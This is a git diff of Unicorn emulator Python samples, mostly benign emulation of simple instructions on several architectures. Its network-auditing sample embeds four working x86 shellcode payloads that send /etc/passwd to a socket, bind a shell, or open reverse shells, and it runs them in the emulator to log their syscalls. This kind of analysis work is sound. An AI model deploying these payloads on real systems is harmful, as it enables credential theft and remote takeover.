0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM64 +def test_arm64(): + print("Emulate ARM64 Big-Endian code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM | UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM64_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM64_REG_X11, 0x12345678) + mu.reg_write(UC_ARM64_REG_X13, 0x10008) + mu.reg_write(UC_ARM64_REG_X15, 0x33) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + print(">>> As big endian, X15 should be 0x12:") + + x11 = mu.reg_read(UC_ARM64_REG_X11) + x13 = mu.reg_read(UC_ARM64_REG_X13) + x15 = mu.reg_read(UC_ARM64_REG_X15) + print(">>> X15 = 0x%x" %x15) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm64() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_armeb.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_armeb.py new file mode 100644 index 0000000..9a2158d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_armeb.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python +# Sample code for ARM big endian of Unicorn. zhangwm <rustydaar@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + + +# code to be emulated +ARM_CODE = b"\xe3\xa0\x00\x37\xe0\x42\x10\x03" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = b"\xb0\x83" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM +def test_arm(): + print("Emulate ARM Big-Endian code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF) #All application flags turned on + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing one instruction at ADDRESS with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + print(">>> R0 = 0x%x" %r0) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_thumb(): + print("Emulate THUMB code") + try: + # Initialize emulator in thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + # Note we start at ADDRESS | 1 to indicate THUMB mode. + mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm() + print("=" * 26) + test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_m68k.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_m68k.py new file mode 100644 index 0000000..7e35cf5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_m68k.py @@ -0,0 +1,88 @@ +#!/usr/bin/env python +# Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.m68k_const import * + + +# code to be emulated +M68K_CODE = b"\x76\xed" # movq #-19, %d3 +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM +def test_m68k(): + print("Emulate M68K code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, M68K_CODE) + + # initialize machine registers + mu.reg_write(UC_M68K_REG_D3, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(M68K_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + a0 = mu.reg_read(UC_M68K_REG_A0) + a1 = mu.reg_read(UC_M68K_REG_A1) + a2 = mu.reg_read(UC_M68K_REG_A2) + a3 = mu.reg_read(UC_M68K_REG_A3) + a4 = mu.reg_read(UC_M68K_REG_A4) + a5 = mu.reg_read(UC_M68K_REG_A5) + a6 = mu.reg_read(UC_M68K_REG_A6) + a7 = mu.reg_read(UC_M68K_REG_A7) + d0 = mu.reg_read(UC_M68K_REG_D0) + d1 = mu.reg_read(UC_M68K_REG_D1) + d2 = mu.reg_read(UC_M68K_REG_D2) + d3 = mu.reg_read(UC_M68K_REG_D3) + d4 = mu.reg_read(UC_M68K_REG_D4) + d5 = mu.reg_read(UC_M68K_REG_D5) + d6 = mu.reg_read(UC_M68K_REG_D6) + d7 = mu.reg_read(UC_M68K_REG_D7) + pc = mu.reg_read(UC_M68K_REG_PC) + sr = mu.reg_read(UC_M68K_REG_SR) + print(">>> A0 = 0x%x\t\t>>> D0 = 0x%x" % (a0, d0)) + print(">>> A1 = 0x%x\t\t>>> D1 = 0x%x" % (a1, d1)) + print(">>> A2 = 0x%x\t\t>>> D2 = 0x%x" % (a2, d2)) + print(">>> A3 = 0x%x\t\t>>> D3 = 0x%x" % (a3, d3)) + print(">>> A4 = 0x%x\t\t>>> D4 = 0x%x" % (a4, d4)) + print(">>> A5 = 0x%x\t\t>>> D5 = 0x%x" % (a5, d5)) + print(">>> A6 = 0x%x\t\t>>> D6 = 0x%x" % (a6, d6)) + print(">>> A7 = 0x%x\t\t>>> D7 = 0x%x" % (a7, d7)) + print(">>> PC = 0x%x" % pc) + print(">>> SR = 0x%x" % sr) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_m68k() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_mips.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_mips.py new file mode 100644 index 0000000..7199b63 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_mips.py @@ -0,0 +1,101 @@ +#!/usr/bin/env python +# Sample code for MIPS of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.mips_const import * + + +# code to be emulated +MIPS_CODE_EB = b"\x34\x21\x34\x56" # ori $at, $at, 0x3456; +MIPS_CODE_EL = b"\x56\x34\x21\x34" # ori $at, $at, 0x3456; + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test MIPS EB +def test_mips_eb(): + print("Emulate MIPS code (big-endian)") + try: + # Initialize emulator in MIPS32 + EB mode + mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EB) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EB)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +# Test MIPS EL +def test_mips_el(): + print("Emulate MIPS code (little-endian)") + try: + # Initialize emulator in MIPS32 + EL mode + mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EL) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EL)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_mips_eb() + print("=" * 27) + test_mips_el() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_network_auditing.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_network_auditing.py new file mode 100644 index 0000000..bfccf82 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_network_auditing.py @@ -0,0 +1,408 @@ +#!/usr/bin/env python +# Unicorn sample for auditing network connection and file handling in shellcode. +# Nguyen Tan Cong <shenlongbk@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * +import struct +import uuid + +SIZE_REG = 4 +SOCKETCALL_MAX_ARGS = 3 + +SOCKET_TYPES = { + 1: "SOCK_STREAM", + 2: "SOCK_DGRAM", + 3: "SOCK_RAW", + 4: "SOCK_RDM", + 5: "SOCK_SEQPACKET", + 10: "SOCK_PACKET" +} + +ADDR_FAMILY = { + 0: "AF_UNSPEC", + 1: "AF_UNIX", + 2: "AF_INET", + 3: "AF_AX25", + 4: "AF_IPX", + 5: "AF_APPLETALK", + 6: "AF_NETROM", + 7: "AF_BRIDGE", + 8: "AF_AAL5", + 9: "AF_X25", + 10: "AF_INET6", + 12: "AF_MAX" +} + +# http://shell-storm.org/shellcode/files/shellcode-861.php +X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" + +# http://shell-storm.org/shellcode/files/shellcode-882.php +X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80" + +# http://shell-storm.org/shellcode/files/shellcode-883.php +X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" + +# http://shell-storm.org/shellcode/files/shellcode-849.php +X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80" + +# memory address where emulation starts +ADDRESS = 0x1000000 + + +# supported classes +class IdGenerator: + def __init__(self): + self.__next_id = 3 # exclude sdtin, stdout, stderr + + def next(self): + next_id = self.__next_id + + self.__next_id += 1 + + return next_id + + +class LogChain: + def __init__(self): + self.__chains = {} + self.__linking_fds = {} + + def clean(self): + self.__chains = {} + self.__linking_fds = {} + + def create_chain(self, my_id): + if not my_id in self.__chains: + self.__chains[my_id] = [] + else: + print("LogChain: id %d existed" % my_id) + + def add_log(self, id, msg): + fd = self.get_original_fd(id) + + if fd is not None: + self.__chains[fd].append(msg) + else: + print("LogChain: id %d doesn't exist" % id) + + def link_fd(self, from_fd, to_fd): + if not to_fd in self.__linking_fds: + self.__linking_fds[to_fd] = [] + + self.__linking_fds[to_fd].append(from_fd) + + def get_original_fd(self, fd): + if fd in self.__chains: + return fd + + for orig_fd, links in self.__linking_fds.items(): + if fd in links: + return orig_fd + + return None + + def print_report(self): + print(""" +---------------- +| START REPORT | +---------------- +""") + + for my_id, logs in self.__chains.items(): + print("---- START FD(%d) ----" % my_id) + print("\n".join(logs)) + print("---- END FD(%d) ----" % my_id) + + print(""" +-------------- +| END REPORT | +-------------- +""") + + +# end supported classes + + +# utilities +def bin_to_ipv4(ip): + return "%d.%d.%d.%d" % ( + (ip & 0xff000000) >> 24, + (ip & 0xff0000) >> 16, + (ip & 0xff00) >> 8, + (ip & 0xff)) + + +def read_string(uc, addr): + ret = "" + + c = uc.mem_read(addr, 1)[0] + read_bytes = 1 + + while c != 0x0: + ret += chr(c) + c = uc.mem_read(addr + read_bytes, 1)[0] + read_bytes += 1 + + return ret + + +def parse_sock_address(sock_addr): + sin_family, = struct.unpack("<h", sock_addr[:2]) + + if sin_family == 2: # AF_INET + port, host = struct.unpack(">HI", sock_addr[2:8]) + return "%s:%d" % (bin_to_ipv4(host), port) + elif sin_family == 6: # AF_INET6 + return "" + + +def print_sockcall(msg): + print(">>> SOCKCALL %s" % msg) + + +# end utilities + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size)) + # read this instruction code from memory + tmp = uc.mem_read(address, size) + print(">>> Instruction code at [0x%x] =" % (address), end="") + for i in tmp: + print(" %x" % i, end="") + print("") + + +# callback for tracing Linux interrupt +def hook_intr(uc, intno, user_data): + global id_gen + + # only handle Linux syscall + if intno != 0x80: + return + + eax = uc.reg_read(UC_X86_REG_EAX) + ebx = uc.reg_read(UC_X86_REG_EBX) + ecx = uc.reg_read(UC_X86_REG_ECX) + edx = uc.reg_read(UC_X86_REG_EDX) + eip = uc.reg_read(UC_X86_REG_EIP) + + # print(">>> INTERRUPT %d" % eax) + + if eax == 1: # sys_exit + print(">>> SYS_EXIT") + uc.emu_stop() + elif eax == 3: # sys_read + fd = ebx + buf = ecx + count = edx + + dummy_content = str(uuid.uuid1()).encode("latin1")[:32] + if len(dummy_content) > count: + dummy_content = dummy_content[:count] + + uc.mem_write(buf, dummy_content) + + msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content) + + fd_chains.add_log(fd, msg) + print(">>> %s" % msg) + elif eax == 4: # sys_write + fd = ebx + buf = ecx + count = edx + + content = uc.mem_read(buf, count) + + msg = "write data=%s count=%d to fd(%d)" % (content, count, fd) + + print(">>> %s" % msg) + fd_chains.add_log(fd, msg) + elif eax == 5: # sys_open + filename_addr = ebx + flags = ecx + mode = edx + filename = read_string(uc, filename_addr) + + dummy_fd = id_gen.next() + uc.reg_write(UC_X86_REG_EAX, dummy_fd) + + msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd) + + fd_chains.create_chain(dummy_fd) + fd_chains.add_log(dummy_fd, msg) + print(">>> %s" % msg) + elif eax == 11: # sys_execv + # print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx)) + filename = read_string(uc, ebx) + + print(">>> SYS_EXECV filename=%s" % filename) + elif eax == 63: # sys_dup2 + fd_chains.link_fd(ecx, ebx) + print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx)) + elif eax == 102: # sys_socketcall + # ref: http://www.skyfree.org/linux/kernel_network/socket.html + call = uc.reg_read(UC_X86_REG_EBX) + args = uc.reg_read(UC_X86_REG_ECX) + + SOCKETCALL_NUM_ARGS = { + 1: 3, # sys_socket + 2: 3, # sys_bind + 3: 3, # sys_connect + 4: 2, # sys_listen + 5: 3, # sys_accept + 9: 4, # sys_send + 11: 4, # sys_receive + 13: 2 # sys_shutdown + } + + buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG) + args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf) + + # int sys_socketcall(int call, unsigned long *args) + if call == 1: # sys_socket + # err = sys_socket(a0,a1,a[2]) + # int sys_socket(int family, int type, int protocol) + family = args[0] + sock_type = args[1] + protocol = args[2] + + dummy_fd = id_gen.next() + uc.reg_write(UC_X86_REG_EAX, dummy_fd) + + if family == 2: # AF_INET + + msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd) + fd_chains.create_chain(dummy_fd) + fd_chains.add_log(dummy_fd, msg) + print_sockcall(msg) + elif family == 3: # AF_INET6 + pass + + elif call == 2: # sys_bind + fd = args[0] + umyaddr = args[1] + addrlen = args[2] + + sock_addr = uc.mem_read(umyaddr, addrlen) + + msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr)) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 3: # sys_connect + # err = sys_connect(a0, (struct sockaddr *)a1, a[2]) + # int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) + fd = args[0] + uservaddr = args[1] + addrlen = args[2] + + sock_addr = uc.mem_read(uservaddr, addrlen) + msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr)) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 4: # sys_listen + fd = args[0] + backlog = args[1] + + msg = "fd(%d) listened with backlog=%d" % (fd, backlog) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 5: # sys_accept + fd = args[0] + upeer_sockaddr = args[1] + upeer_addrlen = args[2] + + # print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen)) + + if upeer_sockaddr == 0x0: + print_sockcall("fd(%d) accept client" % fd) + else: + upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4)) + + sock_addr = uc.mem_read(upeer_sockaddr, upeer_len) + + msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr)) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 9: # sys_send + fd = args[0] + buff = args[1] + length = args[2] + flags = args[3] + + buf = uc.mem_read(buff, length) + msg = "fd(%d) send data=%s" % (fd, buf) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 11: # sys_receive + fd = args[0] + ubuf = args[1] + size = args[2] + flags = args[3] + + msg = "fd(%d) is gonna receive data with size=%d flags=%d" % (fd, size, flags) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 13: # sys_shutdown + fd = args[0] + how = args[1] + + msg = "fd(%d) is shutted down because of %d" % (fd, how) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + +# Test X86 32 bit +def test_i386(code): + global fd_chains + + fd_chains.clean() + print("Emulate i386 code") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, code) + + # initialize stack + mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000) + + # tracing all instructions with customized callback + # mu.hook_add(UC_HOOK_CODE, hook_code) + + # handle interrupt ourself + mu.hook_add(UC_HOOK_INTR, hook_intr) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(code)) + + # now print out some registers + print(">>> Emulation done") + + except UcError as e: + print("ERROR: %s" % e) + + fd_chains.print_report() + + +# Globals +fd_chains = LogChain() +id_gen = IdGenerator() + +if __name__ == '__main__': + test_i386(X86_SEND_ETCPASSWD) + test_i386(X86_BIND_TCP) + test_i386(X86_REVERSE_TCP) + test_i386(X86_REVERSE_TCP_2) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_sparc.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_sparc.py new file mode 100644 index 0000000..5dbe746 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_sparc.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python +# Sample code for SPARC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.sparc_const import * + + +# code to be emulated +SPARC_CODE = b"\x86\x00\x40\x02" # add %g1, %g2, %g3; +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test SPARC +def test_sparc(): + print("Emulate SPARC code") + try: + # Initialize emulator in SPARC EB mode + mu = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, SPARC_CODE) + + # initialize machine registers + mu.reg_write(UC_SPARC_REG_G1, 0x1230) + mu.reg_write(UC_SPARC_REG_G2, 0x6789) + mu.reg_write(UC_SPARC_REG_G3, 0x5555) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(SPARC_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + g3 = mu.reg_read(UC_SPARC_REG_G3) + print(">>> G3 = 0x%x" %g3) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_sparc() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_x86.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_x86.py new file mode 100644 index 0000000..25d947c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_x86.py @@ -0,0 +1,653 @@ +#!/usr/bin/env python +# Sample code for X86 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * +import pickle + +X86_CODE32 = b"\x41\x4a\x66\x0f\xef\xc1" # INC ecx; DEC edx; PXOR xmm0, xmm1 +X86_CODE32_LOOP = b"\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop +X86_CODE32_JUMP = b"\xeb\x02\x90\x90\x90\x90\x90\x90" # jmp 4; nop; nop; nop; nop; nop; nop +X86_CODE32_JMP_INVALID = b"\xe9\xe9\xee\xee\xee\x41\x4a" # JMP outside; INC ecx; DEC edx +X86_CODE32_MEM_READ = b"\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx +X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx +X86_CODE64 = b"\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" +X86_CODE32_INOUT = b"\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx +X86_CODE64_SYSCALL = b'\x0f\x05' # SYSCALL +X86_CODE16 = b'\x00\x00' # add byte ptr [bx + si], al + +# memory address where emulation starts +ADDRESS = 0x1000000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + eflags = uc.reg_read(UC_X86_REG_EFLAGS) + print(">>> --- EFLAGS is 0x%x" %eflags) + +def hook_code64(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + rip = uc.reg_read(UC_X86_REG_RIP) + print(">>> RIP is 0x%x" %rip); + + +# callback for tracing invalid memory access (READ or WRITE) +def hook_mem_invalid(uc, access, address, size, value, user_data): + if access == UC_MEM_WRITE_UNMAPPED: + print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ + %(address, size, value)) + # map this memory in with 2MB in size + uc.mem_map(0xaaaa0000, 2 * 1024*1024) + # return True to indicate we want to continue emulation + return True + else: + # return False to indicate we want to stop emulation + return False + + +# callback for tracing memory access (READ or WRITE) +def hook_mem_access(uc, access, address, size, value, user_data): + if access == UC_MEM_WRITE: + print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ + %(address, size, value)) + else: # READ + print(">>> Memory is being READ at 0x%x, data size = %u" \ + %(address, size)) + + +# callback for IN instruction +def hook_in(uc, port, size, user_data): + eip = uc.reg_read(UC_X86_REG_EIP) + print("--- reading from port 0x%x, size: %u, address: 0x%x" %(port, size, eip)) + if size == 1: + # read 1 byte to AL + return 0xf1 + if size == 2: + # read 2 byte to AX + return 0xf2 + if size == 4: + # read 4 byte to EAX + return 0xf4 + # we should never reach here + return 0 + + +# callback for OUT instruction +def hook_out(uc, port, size, value, user_data): + 